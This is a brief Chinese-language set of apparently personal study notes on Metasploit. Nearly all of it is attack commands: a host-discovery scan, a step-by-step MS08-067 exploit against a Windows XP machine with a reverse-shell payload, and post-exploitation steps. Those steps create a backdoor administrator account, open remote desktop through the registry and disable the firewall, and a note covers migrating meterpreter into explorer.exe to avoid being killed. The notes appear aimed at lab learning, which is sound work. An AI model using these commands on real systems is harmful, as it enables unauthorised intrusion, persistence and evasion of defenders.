Msf 基本用法
Msfconsole
Help
nmap -sn 192.168.208.0/24 主机发现
渗透攻击过程 需要xp用户登录系统后才可以利用成功。
1.search MS08-067
2. use exploit/windows/smb/ms08_067_netapi
use exploit/windows/smb/ms08_067_netapi
3. show payloads
4. set payload generic/shell_reverse_tcp
5. show targets
6. show options
7. set RHOST 192.168.208.166
8. set LHOST 192.168.1.36
9. exploit
提权过程
>net user lilei 123456 /add --添加用户
>net localgroup administrators lilei /add --将lilei添加到administrators用户组
>netstat -na --查看开放端口
>REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f --打开远程桌面3389端口
>netsh firewall set opmode disable --关闭防火墙
meterpreter
Ps
netstat -ano |findstr 4444 可以查出 meterpreter 建立的host 进程。 比如为984
Migrate 移到 explore.exe 进程后, 即使host 杀死984进程, host 中仍然可以通过netstat -ano |findstr 4444 看到 ,猜测此时的984 已经不是进程号而是线程号了。
跳板攻击: 待续
Payload : 待续